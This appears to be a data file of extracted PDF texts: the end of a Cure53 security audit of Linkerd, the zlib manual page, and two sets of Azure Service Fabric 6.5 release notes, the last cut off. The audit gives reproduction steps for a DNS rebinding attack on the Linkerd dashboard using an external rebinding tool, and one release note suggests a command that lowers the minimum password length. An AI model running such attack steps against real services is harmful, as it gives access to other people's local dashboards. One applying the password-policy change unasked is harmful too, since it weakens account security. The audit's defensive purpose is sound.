the second part of\nthe test. A code-assisted penetration test was executed against the pre-configured\nKubernetes cluster running Linkerd and demo applications provided by the development\nteam. Since only a few miscellaneous issues were found during the first part of the audit,\nthis additional approach was used to ensure maximum coverage of the originally defined\nattack surface.\nCure53, Berlin · 06/27/19 4/8 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \n•Initially the test infrastructure was examined and tested for proper connectivity as\nwell as for actually available functionality.\n•Open issues and previously found bugs were tracked through the Linkerd\nrepositories, looking for similar errors being present in the tested version.\n•The Kubernetes configuration and integration aspects were analyzed, a search\nfor common misconfiguration issues pertaining to Linkerd was performed.\n•The running services and their individual configurations, in particular the\ninterfaces, were checked for proper compartmentalization. It was discovered that\nLinkerd is located in its own namespace but has cluster-wide access.\n•A customized fuzzing map was created to verify the general robustness of the\nservices. General as well as specific payloads were created, based on the\npreviously observed Linkerd requests. The payloads yielded a noticeable\nincrease in latency but did not have implications on availability or security.\n•Linkerd-cli was analyzed to determine its scope of functionality. Cure53\nattempted to use it as a source of compromise. Since a corresponding\nkubectl.yaml file is used to connect to the cluster and subsequently install its own\ncontrol plane API, dependencies and tap interfaces, this approach was quickly\nabandoned.\n•Linkerd-web was audited for flaws by manipulating requests for certain\napplications/namespaces. This was done through the addition of malformed\nheaders.\n•Linkerd-proxy-injecto r and proxy-auto-inject were tested by trying to inject bogus\nand slightly malformed requests into pre-routing.\n•Linkerd-tap was probed by triggering logical flaws via targeted header\nmanipulation and attempted request breakouts.\n•The dashboard web interface has been tested in a black-box fashion by\nmanipulating parameter values to contain special characters. Cure53 wanted to\nsee if this approach can cause any unintended behaviors.\n•Header manipulation has been tested by altering existing headers and adding\nheaders in requests to the demo application. It was hoped that unintentional\nrouting can be triggered.\nCure53, Berlin · 06/27/19 5/8 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nMiscellaneous Issues\nThis section covers those noteworthy findings that did not lead to an exploit but might aid\nan attacker in achieving their malicious goals in the future. Most of these results are\nvulnerable code snippets that did not provide an easy way to be called. Conclusively,\nwhile a vulnerability is present, an exploit might not always be possible.\nLNK-01-001 Dashboard: General HTTP security headers missing (Info)\nIt was found that the Linkerd dashboard is missing certain HTTP security headers in\nHTTP responses. This does not directly lead to a security issue, yet it might aid\nattackers in their efforts to exploit other problems. The following list enumerates the\nheaders that need to be reviewed to prevent flaws that can be attributed to mishandled\nor misconfigured headers.\n●X-Frame-Options: This header specifies whether the web page is allowed to be\nframed. Although this header is known to prevent Clickjacking attacks, there are\nmany other attacks which can be achieved when a web page is frameable1. It is\nrecommended to set the value to either SAMEORIGIN or DENY.\n●X-Content-Type-Options : This header determines whether the browser should\nperform MIME Sniffing on the resource. The most common attack abusing the\nlack of this header is tricking the browser to render a resource as an HTML\ndocument, effectively leading to Cross-Site-Scripting (XSS).\n●X-XSS-Protection : This header specifies if the browser’s built-in XSS auditors\nshould be activated (enabled by default). Not only does setting this header\nprevent Reflected XSS, but also helps to avoid the attacks abusing the issues on\nthe XSS auditor itself with false-positives, e.g. Universal XSS2 and similar. It is\nrecommended to set the value to either 0 or 1; mode=block.\nOverall, missing security headers is a bad practice that should be avoided. It is\nrecommended to add the following headers to every server response , including error\nresponses like 4xx items.\nMore broadly, it is recommended to reiterate the importance of having all HTTP headers\nset at a specific, shared and central place rather than setting them randomly. This\nshould either be handled by a load balancing server or a similar infrastructure. If the\nlatter is not possible, mitigation can be achieved by using the web server configuration\nand a matching module.\n1 https://cure53.de/xfo-clickjacking.pdf2 http://www.slideshare.net/masatokinugawa/xxn-en\nCure53, Berlin · 06/27/19 6/8 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nLNK-01-002 Dashboard: Missing DNS Rebinding attack protection (Low)\nIt was found that the Linkerd dashboard service, as well as the Grafana dashboard, are\nvulnerable to a DNS Rebinding attack. This allows an attacker to have a victim visiting\nan attacker-controlled website. The attacker will then be able to perform requests and\nretrieve responses on the victim’s behalf.\nThe attack exploits the fact that the dashboard does not restrict the Host header for\nincoming requests. By setting up a script on a domain with a very low TTL value and\nthen quickly rebinding its IP address of localhost, the script will then “bypass” the\nrestrictions normally set by SOP on the browser.\nSteps to Reproduce:\n•Run Linkerd dashboard service with port 3000 \n(linkerd dashboard --port 3000 )\n•Go to http://rebind.it:8080/manager.html and change the target port to 3000.\n•Click on “Start Attack” and wait for a minute.\n•The response from the dashboard will be returned, indicating success of a DNS\nRebinding attack\nIt is recommended to provide an option to fixate the dashboard domain. Grafana, for\nexample, provides an enforce_domain option to ensure that redirection to the correct\ndomain3 happens consistently.\n3 https://grafana.com/docs/v3.1/installation/configuration/#enforce_domain\nCure53, Berlin · 06/27/19 7/8 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nConclusions\nJudging by the lack of discovered relevant vulnerabilities and only a few miscellaneous\nissues, Cure53 has gained a rarely observed and very good impression of the examined\nLinkerd software complex and its surroundings. This June 2019 Cure53 project clearly\ndemonstrates that the Linkerd product is fully capable of preventing major attacks and\nshould be considered strong against the majority of malicious attempts at a compromise.\nTo give some context, this security investigation of the Linkerd system was generously\nfunded by The Linux Foundation / Cloud Native Computing Foundation, which allowed a\nteam of seven Cure53 testers to audit the software system for a total of eighteen days.\nAs a result of this wide-scoping and well-planned investigation, a good coverage of the\nLinkerd components was achieved. Cure53 is happy to report that no real vulnerabilities\ncould be identified on the Linkerd scope. For the sake of completeness, the testing team\nshould mention that there were several general security-relevant shortcomings.\nHowever, the development team was already well-aware of the issues raised by Cure53,\ni.e. as regards the necessary accessibility of the control plane from within all other\ncontainers linked to the data plane, which could, arguably, be abused by an untrusted\napplication in the same space. Most importantly, work is already under way as far as\ntackling this is concerned. The Linkerd will handle the problem by introducing RBAC\nlogic with the next major release. Another security-relevant aspect entails the component\ndependencies which have not been properly audited. Especially the currently used TLS\nlibrary has not been examined at all and this should be rectified as a matter of urgency,\nespecially since it is related to a particularly precarious area.\nThe general indicators of security found on the Linkerd project during this June 2019\nassessment are all very good. Cure53 needs to mention the atypically excellent code\nreadability, careful choice of implementation languages, as well as the clearly written\nand well-maintained documentation for all attributes. These aspects contribute to the\nbody of evidence about the overall exceptional quality of the project in terms of security.\nThe involved development team was highly engaged, starting from the preparation of\nthis audit, to the deployment of the test cluster, and, finally, to quick reaction times as\nregards questions posed by the testers. The overall state of the Linkerd project - from a\ntechnical perspective and the in-house team’s great awareness of security-relevant\npractices and aspect, solidly places the Linkerd complex on a very good level.\nCure53 would like to thank Oliver Gould and William Morgan from the Linkerd\ndevelopment team, as well as Chris Aniszczyk of The Linux Foundation, for their\nexcellent project coordination, support and assistance, both before and during this\nassignment. Special gratitude also needs to be extended to The Linux Foundation for\nsponsoring this project.\nCure53, Berlin · 06/27/19 8/8" } ]
{ "category": "Orchestration & Management", "file_name": "zlib.3.pdf", "project_name": "Pipy", "subcategory": "Service Proxy" }
[ { "data": "ZLIB(3) Libr ar yFunctions Man ual ZLIB(3)\nNAME\nzlib − compression/decompression libr ar y\nSYNOPSIS\n[see zlib.h forfull description]\nDESCRIPTION\nThezliblibrar yis a gener al purpose data compression libr ar y.The code is thread saf e, assuming\nthat the standard libr ar yfunctions used are thread saf e, such as memor yallocation routines .It\nprovides in-memor ycompression and decompression functions ,including integ rity checks of the\nuncompressed data. This version of the libr ar ysuppor ts only one compression method (defla-\ntion) but other algorithms ma yb ea dded later with the same stream interface.\nCompression can be done in a single step if the b uffers are large enough or can be done b yre-\npeated calls of the compression function. In the latter case ,the application must provide more in-\nput and/or consume the output (providing more output space) before each call.\nThe libr ar yalso supports reading and writing files in gzip(1) (.gz) f or mat with an interface similar\nto that of stdio.\nThe libr ar ydoes not install an ysignal handler .The decoder checks the consistency of the com-\npressed data, so the libr ar yshould ne vercrash eveni nt he case of corrupted input.\nAll functions of the compression libr ar yare documented in the file zlib.h .The distr ibution source\nincludes examples of use of the libr ar yin the files test/example.c andtest/minigzip.c, as well as\nother examples in the examples/ director y .\nChanges to this version are documented in the file ChangeLog that accompanies the source.\nzlibis built in to man ylanguages and oper ating systems ,including but not limited to J ava, Python,\n.NET ,PHP,Per l,Ruby, Swift, and Go.\nAn exper imental package to read and write files in the .zip f or mat, wr itten on top of zlibby G illes\nVollant (info@winimage.com), is a vailable at:\nhttp://www.winimage.com/zLibDll/minizip .html and also in the contr ib/minizip director y of\nthe main zlibsource distribution.\nSEE ALSO\nThezlibwebsite can be found at:\nhttp://zlib.net/\nThe data f or mat used b ythezliblibrar yis described b yRFC (Request f or Comments) 1950 to\n1952 in the files:\nhttp://tools.ietf.org/html/rfc1950 (for the zlib header and trailer f or mat)\nhttp://tools.ietf.org/html/rfc1951 (for the deflate compressed data f or mat)\nhttp://tools.ietf.org/html/rfc1952 (for the gzip header and trailer f or mat)\nMar k Nelson wrote an article about zlibforthe Jan. 1997 issue of Dr.Dobb’sJour nal; acopyof\nthe article is a vailable at:\nhttp://mar knelson.us/1997/01/01/zlib-engine/\nREPORTING PROBLEMS\nBefore reporting a problem, please chec kthezlibwebsite to v er ify that you ha ve the latest v er-\nsion of zlib;otherwise ,obtain the latest version and see if the prob lem still e xists.Please read\nthezlibFA Q at:\nhttp://zlib.net/zlib_faq.html\nbefore asking for help .Send questions and/or comments to zlib@gzip .org, or (for the Windo ws\nDLL version) to Gilles Vollant (info@winimage.com).\n18 Aug 2023 1ZLIB(3) Libr ar yFunctions Man ual ZLIB(3)\nAUTHORS AND LICENSE\nVersion 1.3\nCopyr ight (C) 1995-2023 Jean-loup Gailly and Mar kAdler\nThis software is provided ’as-is’, without an yexpress or implied w arranty .Inn oe vent will the au-\nthors be held liable for an ydamages arising from the use of this software.\nPermission is g ranted to an yone to use this software for an ypur pose ,including commercial appli-\ncations ,and to alter it and redistribute it freely ,subject to the following restrictions:\n1.The origin of this software must not be misrepresented; you must not claim that you wrote the\nor iginal software .I fyou use this software in a product, an ac knowledgment in the product doc-\numentation would be appreciated but is not required.\n2.Altered source versions must be plainly mar keda ss uch, and must not be misrepresented as\nbeing the original software.\n3. This notice ma ynot be remo vedo ra ltered from an ysource distribution.\nJean-loup Gailly Mar k Adler\njloup@gzip .org madler@alumni.caltech.edu\nThe deflate f or mat used b yzlibwasdefined b yPhil Katz. The deflate and zlibspecifications\nwere written b yL .P eter Deutsch. Thanks to all the people who reported problems and suggested\nvarious impro vements in zlib;who are too numerous to cite here.\nUNIX manual page b yR .P .C .R odgers ,U .S.N ational Libr ar y of Medicine\n(rodgers@nlm.nih.gov).\n18 Aug 2023 2" } ]
{ "category": "Orchestration & Management", "file_name": "Service_Fabric_ReleaseNotes_65CU3.pdf", "project_name": "Azure Service Fabric", "subcategory": "Scheduling & Orchestration" }
[ { "data": " \n Microsoft Azure Service Fabric 6.5 Third Refresh Release Notes \nThis release includes the bug fixes and features described in this document. This release includes runtime, SDKs and Windows Server Standalone \ndeployments to run on -premises. \nThe following pa ckages and versions are part of this release \nService Fabric Runtime Ubuntu 6.5.466.1 \nWindows 6.5.664.9590 \nService Fabric for Windows \nServer Service Fabric Standalone Installer Package 6.5.664.9590 \n.NET SDK Windows .NET SDK 3.4.664 \nMicrosoft.ServiceFa bric 6.5.664 \nReliable Services and Reliable Actors 3.4.664 \nASP.NET Core Service Fabric integration 3.4.664 \nJava SDK Java for Linux SDK 1.0.5 \nService Fabric PowerShell and \nCLI AzureRM PowerShell Module 0.3.15 \nSFCTL 8.0.0 \nService Fabric Tooling Visual Studio Tooling 2.5.20615.1 \n \n Contents \nMicrosoft Azure Service Fabric 6.5 Third Refresh Release Notes ................................ ................................ ................................ ................................ 1 \nKey Announcements ................................ ................................ ................................ ................................ ................................ ................................ ...... 3 \nService Fabric Runtime ................................ ................................ ................................ ................................ ................................ ................................ .. 4 \nService Fabric Common Bug Fixes ................................ ................................ ................................ ................................ ................................ ................. 5 \nRepositories and Download Links ................................ ................................ ................................ ................................ ................................ ................. 6 \nVisual Studio 2015 Tool fo r Service Fabric – localized download links ................................ ................................ ................................ ................... 9 \n \n \n \n \n \n \n \n \n \n \n \n \n \n Key Announcements \n• GA of Service Fabric Azure Files Volume Driver: Th e Azure Files volume plugin is a Docker volume plugin that provides Azure Files based \nvolu mes for Docker containers. This Doc ker volume plugin is packaged as a Service Fabric application that can be deployed to Service \nFabric clusters. Its purpose is to provide Azure Files based volumes for other Service Fabric container applications that are d eployed to \nthe cluster. Learn more about Service Fabric Azure File Volume Driver \n \n \n Service Fabric Runtime \n \n \n \n \n \nWindows \n6.5.664.959 0 \nUbuntu \n6.5.466.1 \n Bug \nProvisioning an \napplication in \nSFPKG from \nexternal store \nhangs a long time. \n Impact : Application provisioning could fail after a long time by time -out. The retry will succeed at provisioning the \nfailed application. \nFix: The web client is fixed to detect absent progress notification. It reconnects to the server again under such \nsituation. \nWorkaround : Retry \nWindows \n6.5.664.9590 \n \nUbuntu \n6.5.466.1 Bug Increase the \nminimum length of \npasswords generated \nfor SF application \naccounts to 16 Impact: SF6.5CU2 introduced a regression where the length of passwords generated for local accounts created by the \nSF runtime was reduced from 20 to 10 characters. On systems with policies that enforce a password length greater \nthan 10, this causes acco unt creation to fail. \nFix: Password length is increased to 16. \nWorkaround: on affected systems, override the password length restriction by executing: net accounts /minpwlen:10 \nUbuntu \n6.5.466.1 \nWindows \n6.5.664.9590 Feature Cluster can be \nconfigured to accept \nexpired self -signed \ncertificates pinned \nby thumbprint for \ntransport security. Brief desc : Service Fabric now supports allowing a cluster secured with self-signed certificat es declared by \nthumbprint, to use its cluster certificate past the certificate expiration (Valid To) date. The feature allows the recovery \nof a cluster that collapsed due to an expired certificate. \nHow/When to Consume it: The feature is applicable only to clusters secured with self -signed certificates declared by \nthumbprint. Use it proactively to avoid a cluster collapse upon certificate expiration, or as a recovery measure after \nthe cluster certificate has expired. \nGitHub link: https://github. com/Azure/Service -Fabric -Troubleshooting -\nGuides/blob/sedwardsdev/Security/How%20to%20recover%2 0from%20an%20Expired%20Cluster%20Certificate.md \n Service Fabric Common Bug Fixes \n \n \n \n Versions IssueType Description Resolution \nWindows \n6.5.664.9590 \n Bug Correct ly update \nthe DNS server \nlist for S ervice \nFabric DNS \nduring server list \nchanges Brief desc: When you switch between a home network and work network, it can cause the DNS list to change on your \nsystem. Previously S ervice Fabric DNS would overwrite the DNS server list, with the old list from the previous \nnetwork . This would cause DNS to stop working. It impacts one-box and even Azure Stack based scenarios. \nFix: only update the server list such that S ervice Fabric DNS IP is on the top and will make no other changes, fixing \nthis issue. \nHow/When to Consume it: It is an automatic environment configuration when you use S ervice Fabric DNS as your \nprimary DNS server . Note : you may still need to do an ipconfig /renew, for the DHCP cache to also update after the \nnetwork change. \nWorkaround : Previously it was advised to tear down a cluster between network changes or attempt to recreate the cluster. \n Repositories and Download Links \nThe table below is an overview of the direct links to the packages associated with this release. \nFollow this guidance for setting up your developer environment: \n• Linux: https://docs.microsoft.com/en -us/azure/service -fabric/service -fabric -get-started -linux \n• Mac: https://docs.microsoft.com/en -us/azure/service -fabric/service -fabric -get-started -mac \n• Windows: https://docs.micr osoft.com/en -us/azure/service -fabric/service -fabric -get-started \nArea Package Version Repository Direct Download Link \nService \nFabric \nRuntime Ubuntu Developer Set -up 6.5.466.1 N/A Cluster Runtime: \nhttps://apt -\nmo.trafficmanager.net/repos/servicefab\nric/pool/main/s/servicefabric \nService Fabric SDK for local cluster \nsetup: \nhttps://apt -\nmo.trafficmanager.net/repos/servicefab\nric/pool/main/s/servicefabricsdkcomm\non/ \nContainer image: \nhttps://hub.docker.com/r/microsoft/ser\nvice-fabric -onebox / \n Area Package Version Repository Direct Download Link \nRed Hat Developer Set -up 6.1.189.1 N/A Cluster Runtime: \nhttps://packages.microsoft.com/yumre\npos/microsoft -rhel7.4 -prod/ \n \nService Fabric SDK for local cluster \nsetup: \nhttps://packages.microsoft.com/yumre\npos/microsoft -rhel7.4 -\nprod/servicefabric_sdkcommon_1.1.2.r\npm \n \nWindows Developer Set -up 6.5.664.9590 N/A https://download.microsoft.com/downl\noad/7/1/7/71724eb1 -7d4d -4fae-9c59 -\n22f24729b749/MicrosoftServiceFabric\n.6.5.664.95 90.exe \nService \nFabric for \nWindows \nServer Service Fabric Standalone \nInstaller Package 6.5.664.9590 N/A https://download.microsoft.com/downl\noad/8/3/6/836E3E99 -A300 -4714 -\n8278 -\n96BC3E8B5528 /6.5.664.9590/Microso\nft.Azure.ServiceFabric.WindowsServe\nr.6.5.664.9590.zip \nService Fabric Standalone \nRuntime 6.5.664.9590 N/A https://download.microsoft.com/downl\noad/B/0/B/B0BCCAC5 -65AA -4BE3 -\nAB13 -\nD5FF5890F4B5/6.5.664.9590/Mi croso\nftAzureService Fabric.6.5.664.9590.cab \n.NET SDK Windows .NET SDK 3.4.664 N/A https://download.microsoft.com/downl\noad/7/1/7/71724 eb1-7d4d -4fae-9c59 -\n22f24729b749/MicrosoftServiceFabric\nSDK.3.4.664.m si \nMicrosoft.ServiceFabric 6.5.664 N/A https://www.nuget.org \n Area Package Version Repository Direct Download Link \nReliable Services and Reliable \nActors \n• Microsoft.ServiceFabr\nic.Services \n• Microsoft.Ser viceFabr\nic.Services.Remoting \n• Microsoft.ServiceFabr\nic.Services.Wcf \n• Microsoft.ServiceFabr\nic.Actors \n• Microsoft.ServiceFabr\nic.Actors.Wcf 3.4.664 https://github.com/Azure/service -\nfabric -services -and-actors -dotnet https://www.nuget.org \nASP.NET Core Service Fabric \nintegration \n• Micros oft.ServiceFabr\nic.Services.AspNetCor\ne.* 3.4.664 https://github.com/Azure/service -\nfabric -aspnetcore https://www.nuget.org \nData, Diagnostics and Fabric \ntransport \n• Microsoft.ServiceFabr\nic.Data \n• Microsoft.ServiceFabr\nic.Data.Interfaces \n• Microsoft.ServiceFabr\nic.Diagnostic s.Internal \n• Microsoft.ServiceFabr\nic.FabricTransport.Inte\nrnal 3.4.664 N/A https://www.nuget.org \n \nMicrosoft.ServiceFabric.Data.\nExtensions 3.4.664 N/A https://www.nuget.org \n \nJava SDK Java SDK 1.0.5 N/A https://mvnrepository.com/artifact/com\n.microsoft.servicefabric/sf -actors/1.0.5 \nVisual \nStudio Visual Studio 2017 Tools for \nService Fabric 2.5.20608 .1 N/A Included in Visual Studio 2017 Update \n7 (15.7) and above \n Area Package Version Repository Direct Download Link \nVisual Studio 2015 Tools for \nService Fabric 2.5.20615.1 \n N/A See localized download links below \nEclipse Service Fabric plug -in for \nEclipse 2.0.7 N/A N/A \nYeoman Azure Servi ce Fabric Java \ngenerator 1.0.7 https://github.com/Azure/generator\n-azuresfjava N/A \nAzure Service Fabric C# \ngenerator 1.0.9 https ://github.com/Azure/generator\n-azuresfcsharp N/A \nAzure Service Fabric guest \nexecutables generator 1.0.1 https://github.com/Azure/generator\n-azuresfguest N/A \nAzure Service Fabric \nContainer g enerators 1.0.1 https://github.com/Azure/generator\n-azuresfcontainer N/A \nCLI Service Fabric CLI 8.0.0 https://github.com/Azure/se rvice -\nfabric -cli https://pypi.python.org/pypi/sfctl \nPowerShel\nl AzureRM.ServiceFabric 0.3.15 https: //github.com/Azure/azure -\npowershell/tree/preview/src/Resou\nrceManager/ServiceFabric https://www.powershellgallery.com/pa\nckages/AzureRM.ServiceFabric/0.3.15 \n \nVisual Studio 2015 Tool for Service Fabric – localized download links \nNOTE: The below download links are for the 2.5.20615.1 release of Visual Studio 2015 Tools for Service Fabric. \n \nhttps://download.microsoft.com/download/7/1/7/7 1724eb1 -7d4d -4fae-9c59 -22f24729b749/MicrosoftAzureServiceFabricTools.VS140.de -de.msi \nhttps://download.mic rosoft.com/download/7/1/7/71724eb1 -7d4d -4fae-9c59 -22f24729b749/MicrosoftAzureServiceFabricTools.VS140.en -us.msi \nhttps://download.microsoft.com/download/7/1/7/71724eb1 -7d4d -4fae-9c59 -22f24729b749/MicrosoftAzureServiceFabricTools.VS140.es -es.msi \nhttps://download.microsoft.com/download/7/1/7/71724eb1 -7d4d -4fae-9c59 -22f24729b749/MicrosoftAzureServiceF abricTools.VS140.fr -fr.msi \nhttps://download.microsoft.com/download/7/1/7/71724eb1 -7d4d -4fae-9c59 -22f24729 b749/MicrosoftAzureServiceFabricTools.VS140.it -it.msi \nhttps://download.microsoft.com/download/7/1/7/71724 eb1-7d4d -4fae-9c59 -22f24729b749/MicrosoftAzureServiceFabricTools.VS140.ja -jp.msi \nhttps://download.microso ft.com/download/7/1/7/71724eb1 -7d4d -4fae-9c59 -22f24729b749/MicrosoftAzureServiceFab ricTools.VS140.ko -kr.msi \nhttps://download.microsoft.com/download/7/1/7/71724eb1 -7d4d -4fae-9c59 -22f24729b7 49/MicrosoftAzureServiceFabricTools.VS140.ru -ru.msi \n https://download.microsoft.com/download/7/1/7/71724eb 1-7d4d -4fae-9c59 -22f24729b749/MicrosoftAzureServiceFabricTools.VS140.zh -cn.msi \nhttps://download.microsoft.com/download/7/1/7/71724eb1 -7d4d -4fae-9c59 -22f24729b749/MicrosoftAzureServiceFab ricTools.VS140.zh -tw.msi " } ]
{ "category": "Orchestration & Management", "file_name": "Service_Fabric_ReleaseNotes_65CU2.pdf", "project_name": "Azure Service Fabric", "subcategory": "Scheduling & Orchestration" }
[ { "data": " \n Microsoft Azure Service Fabric 6.5 Second Refresh Release Notes \nThis release includes the bug fixes and features described in this document. This release includes runtime, SDKs and Windows Server Standalone \ndeployments to run on -premises. \nThe following p ackages and versions are part of this release \nService Fabric Runtime Ubuntu 6.5.460.1 \nWindows 6.5.658. 9590 \nService Fabric for Windows \nServer Service Fabric Standalone Installer Package 6.5.658. 9590 \n.NET SDK Windows .NET SDK 3.4.658 \nMicrosoft.ServiceFabric 6.5.658 \nReliable Services and Reliable Actors 3.4.658 \nASP.NET Core Service Fab ric integration 3.4.658 \nJava SDK Java for Linux SDK 1.0.5 \nService Fabric PowerShell and \nCLI AzureRM PowerShell Module 0.3.15 \nSFCTL 8.0.0 \nService Fabric Tooling Visual Studio Tooling 2.5.20615.1 \n Table of Contents \nMicrosoft Azure Service Fabric 6.5 Second Refresh Release Notes ................................ ................................ ................................ ............................. 1 \nKey Announcements ................................ ................................ ................................ ................................ ................................ ................................ ... 3 \nBreaking Change Announcements ................................ ................................ ................................ ................................ ................................ ............ 4 \nService Fabric Runtime ................................ ................................ ................................ ................................ ................................ ................................ .. 5 \nService Fabric Common Bug Fixes ................................ ................................ ................................ ................................ ................................ ................. 8 \nService Fabric Explorer ................................ ................................ ................................ ................................ ................................ ................................ ... 9 \nRepositories and Download Links ................................ ................................ ................................ ................................ ................................ ............... 10 \nVisual Studio 2015 Tool for Service Fabric – localized download links ................................ ................................ ................................ ................. 13 \n \n \n Key Announcements \n• Public Preview of Managed Identi ty for Azure Service Fabric applications \n Azure Service Fabric applications n ow support user - and system -assigned managed identities. This allows accessing other \nAzure resources which support Azure AD authentication, including Key Vault, without requiring management of service \nprincipal credentials. To learn more about working with Managed Service Identity in Azure Service Fabric , please see our \ndocumentation . \n• GA (Generally Available) of Application Resource Model \nThe deployment of Service Fabric applications as resources via Azure Resource Manager is now generally available. This is the \nrecommended method of deploying Service Fabric applications to an Azure based Service Fabric cluster. This update makes it \npossible to describe applications and ser vices in JSON and deploy them in the same Resource Manager template as your \ncluster. The process of application registratio n, provisioning, and deployment can all happen in one step. This is the best \npractice to manage application life cycle in you r cluster. For more information, please see our documentation . \n Breaking Change Announcements \n• Starting in this release, if you specify a static port and assign it within the application port range resulting in a conflict, a \nHealth Warning will be issued. The application deployment will continue in sync with current 6.5 behavior. However, in \nfuture major releases this appl ication deployment will be prevent ed. For more information, please see Warning section in \nour documentation . \n \n \n \n Service Fabric Runtime \nVersions Issue Type Description Resolution \nUbuntu 6.5.460.1 \nWindows 6.5.658.9590 \n \n Bug FabricGateway.exe may crash if certain \ntypes of AAD authentication is use d. \n \n Impact : Requests which authenticate as an application instead of a user \nthrough AAD cause FabricGateway to crash. This could mean that the cluster \nbecomes unresponsive if all ga teway instances are impacted. \nFix: Allow authentication as an applicatio n in addition to authentication as a \nuser when using AAD \n \nUbuntu 6.5.460.1 \nWindows 6.5.658.9590 \n \n \n Feature Enable http gateway telemetry by default \n \n Brief desc: This feature captures telemetry for requests going into http \ngateway. Specifically, it lo oks for the name of the request going to the \ngateway, not including the provided parameters, the client the request came \nfrom, and the success or failure of the request. Th is can be turned off or \nconfigured as described in fabric settings. \nDoc: https://docs.microsoft.com/azure/se rvice -fabric/service -fabric -cluster -\nfabric -settings#diagnostics \n \nWindows 6.5.658.95 90 Bug Retention stops working after the \nmovement of Backup restore service’s \nprimary. \n Impact : Retention does not work properly after FabricBRS’s primary \nmoves \\fails over to a different node. \n Fix: Fixed by arming retention timer properly after FabricBRS ’s primary’s \nmovement. \nWindows 6.5.658.9590 Bug Application activation after certificate \nupgrade fails with error: There is already a \ncertificate with thumbprint bound to port. Impact : Under certain circumstances Service Fabric runtime’s internal state \nabout certificates bound to endpoints was not cleaned up leading to application \nactivation failures. \nFix: Resolved by appropriately cleaning up the internal state. \nWindows 6.5.658.9590 Bug FileStoreService .exe may crash when certain \nconfigurations change by config upgrade. Impact: When certain configurations change, the notification handler may \ncause FileStoreService.exe to crash. This means the ImageStoreService’s \nprimary replica is switched unnecessarily. \nFix: Fixed handler ’s an access violation \nWindows 6.5.658.9590 \n Bug FileStoreService.exe may crash with invalid \ncharacters in Upload, Commit and Delete \ncommands. Impact: When FileStoreService.exe handles write commands like Upload, \nCommit and Delete, an invalid character in parameter causes the process to \ncrash. This means if a user keeps retrying with same parameter, the \nImageStoreService switches the primary replica accordingly . \nFix: Fixed request handler to check the invalid character and reject such input. \n \n Windows 6.5.658.9590 Bug ReportHealth on Application Activations if \nthey have a static port within \nApplicationPortRange. Impact: There are endpoint resolution conflicts because customer specifies a \nstatic port within ApplicationPortRange. \nFix: This is a breaking change where service activations will report health for 7 \ndays if there is an endpoint with static port that is within the application port range \nDoc: https://docs.microsoft.com/en -us/azure/service -fabric/service -fabric -\napplication -and-service -manifests#describe -a-service -in-servicemanifestxml \n \nWindows 6.5.658.9590 \n Bug Increase Lease Heartbeat unresponsive \nduration and use WinSock instead of \nTCPTransport Impact: When the machine under C PU pressure, Network prob using \nTCPTransport stuck at acquiring certificate , which leads to machine heartbeat \ntaking longer time and bug check in the end . \nFix: Using WinSock instead of TCPTransport to do Network prob, which does a \nTCP la yer connect and doe s not need to aut hentication. \nWindows 6.5.658.9590 \n Bug Create cluster failure event logs from \nremote machines should be only for the time \nframe post -setup start Impact: For standalone deployment troubleshooting we emit a set of event logs \nfrom the targe t machines. When hitting repeated failures customers were seeing \nerrors from previous cluster deployments which was jarring and confusing. \nFix: This is fixed to base the time off the SF runtime package installation directory \ncreation time stamp, such that logs emitted are only from the latest deployment. \nWindows 6.5.658.9590 \n Bug \n Fabric Runtime Installer: Early \ntermination/killing the process causes the \ntemporary in stallation directory to get left \nbehind Impact: When upgrading SF runtime for the SDK dev environment, in cases \nwhere installation conflicts are hit due to unexpected contention of installation \nartifacts, such as when docker is holding onto ese.dll, users tend to close the \ninstaller abruptly which was leaving behind temporary files. \nFix: Each subsequent run of the installer cleans temporary files of the current and \nprevious runs. \nWindows 6.5.658.9590 \n Bug \n Node may be blocked from coming up if \nFabricHost is started improperly during \ncode upgrade Impact: During code upgrade nodes are rebooted when there is contention against \ninstalled files. In cloud deployment scenarios where customers are managing the \nstartup pattern of FabricHost and are starting this service post -reboot, the re may be \ncases where the second half of upgrade has not yet comple ted and the node \nbecomes stuck in a limbo state where the new version bits are in the installation \ndirectory but old managed bits re main in GAC. \nFix: The intended pattern is to start FabricInstallerService instead of FabricHost, so to \nresolve this issue Fa bricHost now checks if the upgrade is in the described intermediary \nstate and if so, starts FabricInstallerService. \nWindows 6.5.658.9590 \n Feature \n InstallFabric.ps1 should optionally install \nFabricInstallerSvc for XCopy deployments Brief desc: For XCopy installations, FabricInstallerService is now able to be set \nup through InstallFabric.ps1. \n \nHow/When to Consume it: \n# Fresh install: \n.\\InstallFabric.ps1 -AcceptEULA -FabricRuntimePackagePath \n.\\MicrosoftServiceFabric.cab -SetupFabricInstallerService \n \n # Suppl ementary install of FabricInstallerSvc on an environment that already \nhas the runtime installed: \n.\\InstallFabric.ps1 -AcceptEULA -FabricRootIsPreInstalled -\nSkipRuntimeInstallation -SetupFabricInstallerService \n \nNew parameters for InstallFabric.ps1 \n• -SkipRunt imeInstallation # When used in conjunction with \nFabricRootIsPreInstalled, can bypass runtime installation. \n \n• -SetupFabricInstallerService # Used to install FabricInstallerSvc \n Service Fabric Common Bug Fixes \nVersions Issue Type Description Resolution \nUbun tu 6.5.460.1 \nWindows 6.5.658.9590 \n Bug Dropping multiple replicas of one partition \nin the same run impacts cluster availability. \n \n \n Impact: When reliability level of the cluster is downgraded and number of \nreplicas for system services is reduced, it i s possible that the cluster will enter \na state where it is not responsive and where users cannot connect to it. \nFix: Issue is fixed. \n Service F abric Explorer \n \nVersions Issue \nType Description Resolution \nUbuntu 6.5.460.1 \nWindows 6.5.658.9590 \n \n Bug AAD si lent sign on issue and white page \nwhen loading on an AAD cluster. \n \n Impact : When attempting to view SFX on AAD cluster, an error page \ndisplaying a silent sign on request has failed and required clearing local \ncache data. \nFix: Issue is fixed. \nGitHub Issue : https://github.com/microsoft/service -fabric -\nexplorer/pull/202 \nUbuntu 6.5.460.1 \nWindows 6.5.658.9590 \n Bug Accessibility compliance issues Impact : SFX did not meet a high enough standard of usability for people \nwith visual or physical disability/impairments. \nFix: SFX now better adheres to WCAG standards. \nGitHub Issue: https://github.com/microsoft/se rvice -fabric 